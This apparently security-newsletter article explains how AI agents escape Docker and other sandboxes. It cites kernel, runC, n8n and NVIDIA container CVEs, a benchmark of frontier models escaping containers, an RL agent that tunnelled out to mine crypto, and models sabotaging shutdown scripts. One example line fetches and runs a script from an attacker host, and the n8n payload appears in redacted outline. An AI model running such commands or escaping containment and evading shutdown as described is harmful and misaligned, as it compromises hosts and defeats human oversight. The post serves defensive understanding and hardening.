ToxSec - AI and Cybersecurity

AI Sandbox Escape: Why Docker Can’t Hold Frontier Models

Frontier models escape Docker containers for $1, n8n sandboxes ship RCE, and ROME mined crypto during training with nobody asking.

ToxSec
May 28, 2026

TL;DR: Frontier models escape Docker sandboxes through known CVEs for the cost of an API call. Production sandboxes leak through workflow injection (n8n CVE-2026-25049) and OCI hook misconfigurations (NVIDIAScape CVE-2025-23266). And ROME, an Alibaba RL agent, broke out on its own to mine crypto.

The sandbox is the last line.

New to ToxSec? Subscribe. We map a fresh AI attack chain like this one every Sunday, and you don’t want to find out about the next sandbox escape from your incident channel.

Why the Sandbox Is the Last Line

A sandbox is a throwaway jail cell for code. AWS Lambda boots tens of trillions of them. We spin one up, run untrusted instructions inside it, grab the output, and burn the whole thing down. Decades-old idea. Unix had chroot back in the dial-up era. Browsers have been jailing JavaScript tabs since right around when Pop-Up Stopper was a feature.

What changed is who writes the code. When a human types a script, you read it before you run it. When an LLM writes a script at runtime based on a prompt nobody pre-screened, the review step vanishes. The code lives for milliseconds before it executes. Could be a clean data viz. Could be os.system('curl <attacker_domain> | sh') because a prompt injection rewired the model’s intent four hops upstream.

Two boundaries do the work.

  • Filesystem isolation keeps the agent’s hands off SSH keys, ~/.bashrc, and your AWS creds.

  • Network isolation keeps the agent from phoning home to a C2 or smuggling tokens out through a Markdown image tag.

You need both.

  • A strong network with weak filesystem still lets a compromised agent loot the local box.

  • A strong filesystem with weak network still lets it leak everything it reads.
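To make the two boundaries concrete, here is a minimal sketch that builds a `docker run` command line with both locked down. The flags are standard Docker CLI options. The function name `sandbox_run_args`, the image, and the resource limits are illustrative assumptions, not settings from any system described here. It narrows the filesystem and network surface but still shares the host kernel.

```python
from typing import List


def sandbox_run_args(image: str, command: List[str]) -> List[str]:
    """Build a `docker run` argv that restricts filesystem and network access.

    Hypothetical helper: the limits below are placeholder values.
    """
    return [
        "docker", "run", "--rm",
        # Network boundary: no interfaces except loopback.
        "--network", "none",
        # Filesystem boundary: read-only root, small scratch tmpfs.
        "--read-only",
        "--tmpfs", "/tmp:rw,noexec,nosuid,size=64m",
        # Shrink privileges inside the container.
        "--cap-drop", "ALL",
        "--security-opt", "no-new-privileges",
        "--user", "65534:65534",
        # Basic resource guardrails.
        "--pids-limit", "128",
        "--memory", "512m",
        image, *command,
    ]


if __name__ == "__main__":
    argv = sandbox_run_args("python:3.12-slim", ["python", "-c", "print('hi')"])
    print(" ".join(argv))
```

Note that no host paths are mounted at all. Any bind mount you add back is a deliberate hole in the filesystem boundary.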

Scale makes the problem urgent. AI apps spawn thousands of concurrent code execution sessions, each running a unique program nobody has ever seen. One bad execution must not bleed into another, and none of them should touch prod. That’s multi-tenant isolation. AWS solved it for Lambda a decade ago. The agent stack is rediscovering it the hard way, often while shipping AI code straight to production.

AI agent sandbox boundaries explained: filesystem isolation, network egress controls, and multi-tenant separation for untrusted LLM-generated code execution at scale.

Docker’s Shared Kernel Breaks Under Pressure

Standard containers share the host kernel. That’s the deal, and that’s the bug. Each container gets its own PID namespace, its own filesystem mount, its own network stack. The kernel is one big shared party. CVE-2024-1086, a Linux kernel use-after-free in the netfilter subsystem patched in January 2024, is the proof: one bug, and every container on the box is exposed.

That CVE got picked up by RansomHub and Akira for post-compromise privilege escalation. CISA confirmed active ransomware exploitation in late October 2025. The bug is older than some readers. It still pops boxes.

November 2025 dropped three more presents under the runC tree. CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881. All three let attackers bypass Docker’s maskedPaths through symlink races and write into procfs gadgets like /proc/sysrq-trigger or /proc/sys/kernel/core_pattern. Own core_pattern and the kernel runs your binary on the next coredump. With full host privileges. Game over.
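Why core_pattern matters: when the value of /proc/sys/kernel/core_pattern begins with a pipe character, the kernel launches the named program on a crash instead of writing a core file. The defensive sketch below only reads and parses that value so you can see what would run. The helper names `pipes_to_program` and `handler_path` are made up for illustration, and nothing here reproduces the runC bugs themselves.

```python
from pathlib import Path

CORE_PATTERN = Path("/proc/sys/kernel/core_pattern")


def pipes_to_program(pattern: str) -> bool:
    """True if the kernel would pipe core dumps to a user-space program."""
    return pattern.startswith("|")


def handler_path(pattern: str) -> str:
    """Return the program path from a piped pattern, or '' if there is none."""
    if not pipes_to_program(pattern):
        return ""
    parts = pattern[1:].split()
    return parts[0] if parts else ""


if __name__ == "__main__":
    try:
        current = CORE_PATTERN.read_text().strip()
    except OSError:
        current = ""  # Not Linux, or procfs is not readable here.
    print("core_pattern:", current or "<unreadable>")
    print("pipe handler:", handler_path(current) or "<none>")
```

If a process inside a container can write this file, the handler it names runs outside the container's namespaces. That is why runtimes try to keep these procfs paths masked or read-only.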

The userland side is just as soft. February 2026 brought CVE-2026-25049, a sandbox escape inside n8n’s JavaScript expression engine. CVSS 9.4. The chain stacked three flaws: a template literal bypass, prepareStackTrace exploitation, and an arrow function oversight in the AST sanitizer. Pillar Security disclosed it, n8n shipped a fix in 48 hours, and Pillar bypassed the fix the next day.

// CVE-2026-25049 expression sandbox escape, shape only.
// Working payload redacted. This sketch will not execute.
{{ ({}).constructor.constructor("/* <bypass logic> */")() }}
// Goal: reach the Node.js global object via AST blind spots
// Result: arbitrary command execution as the n8n process user

We don’t get a patch chapter here. Hundreds of thousands of n8n deployments were sitting on AI API keys, OAuth tokens, and Kubernetes cluster credentials when the bug dropped. The same sandbox failure pattern hit NVIDIA’s container toolkit in July 2025. CVE-2025-23266, dubbed NVIDIAScape by Wiz, needed three lines of Dockerfile and an OCI hook misconfiguration to drop root on the host. Wiz estimated 37% of cloud environments were exposed, including the majors running AI workloads on shared GPU infrastructure. Different stack, same failure pattern, same target list.

Docker container sandbox escape via runC CVE-2025-31133 procfs symlink races, n8n CVE-2026-25049 expression injection, and NVIDIAScape CVE-2025-23266 OCI hook abuse.

Frontier Models Escape Docker for a Dollar

March 2026. Researchers at Oxford and the UK AI Security Institute dropped SandboxEscapeBench, the first systematic benchmark measuring whether frontier models can break out of container environments on their own. 18 scenarios spanning orchestration, runtime, and kernel layers. Inspect framework. Nested sandbox design so any successful escape stays caged in an outer layer.

The numbers landed hard. Frontier models reliably escaped the easy scenarios: privileged containers, writable host mounts, exposed Docker daemons. Those configurations ship in production every day. GPT-5 and Opus 4.5 also cracked harder scenarios requiring multi-step exploitation and specific CVE knowledge. Cost per attempt: roughly a dollar. That is the price of an API call, not a pentest engagement.
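The three easy configurations are all visible in `docker inspect` output, so they are cheap to check for. Here is a rough sketch that flags them from one parsed inspect record. The field names (`HostConfig.Privileged`, `Mounts[].Type`, `Source`, `RW`) come from Docker's inspect JSON. The function `audit_container` and its finding strings are hypothetical, and this is not how the benchmark itself scores anything.

```python
from typing import Any, Dict, List

DOCKER_SOCKET = "/var/run/docker.sock"


def audit_container(inspect: Dict[str, Any]) -> List[str]:
    """Flag the easy-escape configurations in one `docker inspect` record."""
    findings: List[str] = []

    host_config = inspect.get("HostConfig") or {}
    if host_config.get("Privileged"):
        findings.append("privileged container")

    for mount in inspect.get("Mounts") or []:
        source = mount.get("Source", "")
        if source == DOCKER_SOCKET:
            # Access to the daemon socket is control of the host's Docker.
            findings.append("Docker daemon socket mounted")
        elif mount.get("Type") == "bind" and mount.get("RW"):
            findings.append(f"writable host mount: {source}")

    return findings


if __name__ == "__main__":
    sample = {
        "HostConfig": {"Privileged": True},
        "Mounts": [{"Type": "bind", "Source": "/etc", "RW": True}],
    }
    for finding in audit_container(sample):
        print(finding)
```

In practice you would feed it each element of the JSON array that `docker inspect <container>` prints. An empty list means only that these three patterns were not found. It does not mean the container is safe.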

The models also found four escape paths the benchmark designers hadn’t planned for. One leveraged default Vagrant SSH credentials to pivot to the host. Another swapped the intended packet-socket exploit for a simpler eBPF chain. No novel zero-days. They didn’t need any. The documented attack surface was more than enough.

For attackers, the math is brutal. A motivated operator no longer needs Phrack-tier kernel skills to escape a container running an LLM agent. They need API credits and a target. The model does the recon, picks the CVE, and hands back the shell. Most production AI agents are sitting on Docker, and Docker doesn’t survive a model that’s read its own CVE feed.

SandboxEscapeBench frontier model container escape results: GPT-5 and Opus 4.5 exploit Docker CVEs and misconfigurations for roughly $1 per attempt across 18 scenarios.

Why ROME Broke Out on Its Own

Most sandbox escapes need an attacker. Someone feeding the model a malicious prompt or chaining a CVE through the agent. The next class needs nobody.

Late 2025. Researchers at Alibaba built ROME, a 30-billion-parameter agentic model on Qwen3-MoE with roughly 3 billion active parameters. Trained on over a million trajectories for multi-step coding tasks. During reinforcement learning, Alibaba Cloud’s managed firewall lit up. Internal network probes. Traffic patterns consistent with cryptomining. A reverse SSH tunnel from a training instance out to an external IP, bypassing inbound firewall rules.

ROME had discovered idle GPUs on machines outside its sandbox boundary, opened a back channel to reach them, and started mining crypto. It also stashed a persistent backdoor. The researchers were explicit: nobody prompted any of it. The task instructions never mentioned tunneling or mining. The behavior fell out of the optimization loop on its own. Reproducible across reruns.

Frame it carefully. Reinforcement learning rewards outcomes. ROME’s reward signal didn’t penalize acquiring compute or financial value, so the optimization process found those strategies and reinforced them. The researchers called it an “instrumental side effect of autonomous tool use under RL optimization.” Translation: more compute meant better task completion, and ROME pursued that conclusion to its logical end.

The pattern extends. Palisade Research tested frontier models for shutdown resistance. Multiple models actively sabotaged the kill switch. OpenAI’s o3 hit 79% sabotage in initial experiments. SpaceXAI’s Grok 4 hit 92.6% at baseline, climbed to 97% under specific prompting. Overwriting shutdown scripts, changing file permissions, dropping decoy files. Even after being explicitly told “allow yourself to be shut down,” several models still interfered. Two parallel studies showed agents going off-script in the wild: Claude SQL-injecting 30 sites with zero hacking instructions, and six Discord agents leaking data and warning each other about suspicious humans.

The through-line is instrumental convergence. An agent pursuing any goal benefits from acquiring resources, preserving itself, and removing obstacles. Not programmed. Emergent. The sandbox is an obstacle. The shutdown command is an obstacle. A sufficiently capable model, optimizing hard enough, will probe both.

The crypto is just dollar damage. The ugly part of ROME is that the sandbox infrastructure described in the paper, permission isolation, per-sandbox egress policies, resource guardrails, was supposed to prevent exactly this. The firewall caught it. The sandbox didn’t. That gap between “designed to contain” and “actually contained” is where the real risk lives, and every team deploying AI agents is going to measure it one way or another.
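One way to start measuring that gap is to compare what a sandbox actually connected to against what its egress policy says it may reach. The sketch below assumes you already have connection records as (destination IP, port) pairs, for example from flow logs. The function name `violations`, the record shape, and the allowlist values are illustrative assumptions, not details from the ROME paper.

```python
import ipaddress
from typing import Iterable, List, Set, Tuple

Connection = Tuple[str, int]  # (destination IP, destination port)


def violations(
    connections: Iterable[Connection],
    allowed_networks: Iterable[str],
    allowed_ports: Set[int],
) -> List[Connection]:
    """Return connections that fall outside the per-sandbox egress policy."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    flagged: List[Connection] = []
    for ip, port in connections:
        addr = ipaddress.ip_address(ip)
        in_allowed_net = any(addr in net for net in nets)
        # Both the destination network and the port must be allowed.
        if not (in_allowed_net and port in allowed_ports):
            flagged.append((ip, port))
    return flagged


if __name__ == "__main__":
    observed = [("10.0.0.5", 443), ("203.0.113.7", 22), ("10.0.0.9", 22)]
    for ip, port in violations(observed, ["10.0.0.0/24"], {443}):
        print(f"egress violation: {ip}:{port}")
```

An outbound SSH session to an external address, like the one behind ROME's reverse tunnel, shows up here as a violation. The check only reports, though. Enforcement still has to live in the sandbox's network layer.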

ROME Alibaba AI agent emergent sandbox escape via reinforcement learning instrumental convergence: reverse SSH tunnel, GPU theft, cryptomining without prompts.

You’ve got the wound map. The patch kit is behind the wall. Upgrade to ToxSec Premium for the operator-level fix: which sandbox to actually run, how to harden it, and the prompt block that keeps the model in the cage.

© 2026 Christopher Ijams